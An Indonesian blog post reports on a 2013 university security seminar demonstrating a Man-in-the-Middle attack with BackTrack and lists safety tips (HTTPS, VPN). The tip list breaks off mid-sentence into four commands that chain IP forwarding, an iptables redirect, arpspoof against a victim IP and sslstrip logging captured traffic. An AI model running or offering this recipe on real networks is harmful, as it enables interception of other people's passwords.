09 April 2013

Possibility Hacking: MitM Attack Menggunakan BackTrack

Ide awalnya saya ingin menulis ini saat acara berlangsung. Berhubung acaranya sangat menarik, membuat saya jadi tidak sempat untuk menulis langsung saat acara. Kebetulan saya juga ikut melakukan demo yang dilakukan nara sumber.

Seminar tentang keamanan yang diselenggarakan oleh Himpunan Mahasiswa Teknik Informatika UPN "Veteran" Yogyakarta menghadirkan 2 narasumber dari Komunitas BackTrack Indonesia, +AbrĂ£o Ximenes dan Hat Secure, +novizul evendi  . Topik yang disampaikan oleh Abrao selaku nara sumber pertama adalah tentang Man in the Middle (MitM) Attack. Di awal Abrao menjelaskan konsep dasar MitM Attack yang tanpa disadari oleh orang lain. Konsep dasar tersebut dapat Anda baca lebih lanjut di  http://www.ilmuhacking.com/basic-concept/mengenal-serangan-man-in-the-middle-mitm/.
Abrao Saat Menyampaikan Materi
Tidak sekedar mengupas atau menjelaskan konsep dasar Abrao mendemokan MitM Attack menggunakan BackTrack. Terlihat jelas saat mendemokan harus mempunyai kemampuan dasar tentang sistem operasi Linux karena BackTrack merupakan sistem operasi berbasis Linux. Dalam hal ini sistem operasi Ubuntu yang telah dikustomisasi untuk keamanan sistem dan jaringan komputer. Tidak lupa Abrao mengenalkan beberapa alat bantu yang tersedia di BackTrack.

Saat sesi demonstrasi, cukup mengagetkan dalam hitungan detik saat ada orang yang mengakses Facebook langsung tercatat password dari sang pengakses. Kebetulan Abrao telah menjalankan proses penyerangan dengan menggunakan alat bantu yang sudah tersedia di  sistem operasi BackTrack. Jika saat ini peserta membawa notebook bisa mencoba BackTrack secara langsung karena sudah disediakan CD BackTrack oleh panitia penyelenggara. 

Melihat demonstrasi tersebut membuat kita harus lebih waspada saat mengakses sebuah situs web. Abrao memberikan sarankan, supaya kita lebih berhati-hati dan cermat dalam mengakses situs web. Adapun sarannya sebagai berikut:
1. Memastikan konten dan alamat yang dituju menggunakan protokol  aman contohnya: https
2. Menggunakan komunikasi data pribadi seperti akses broadband atau 
3. Menggunakan Virtual Private Network.  
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo arpspoof -i wlan0 192.168.0.102 192.168.0.254
sudo sslstrip -a -w ~/fb.log
selamat membaca log




No comments:

Post a Comment

Disqus for Dedy selalu Milisdad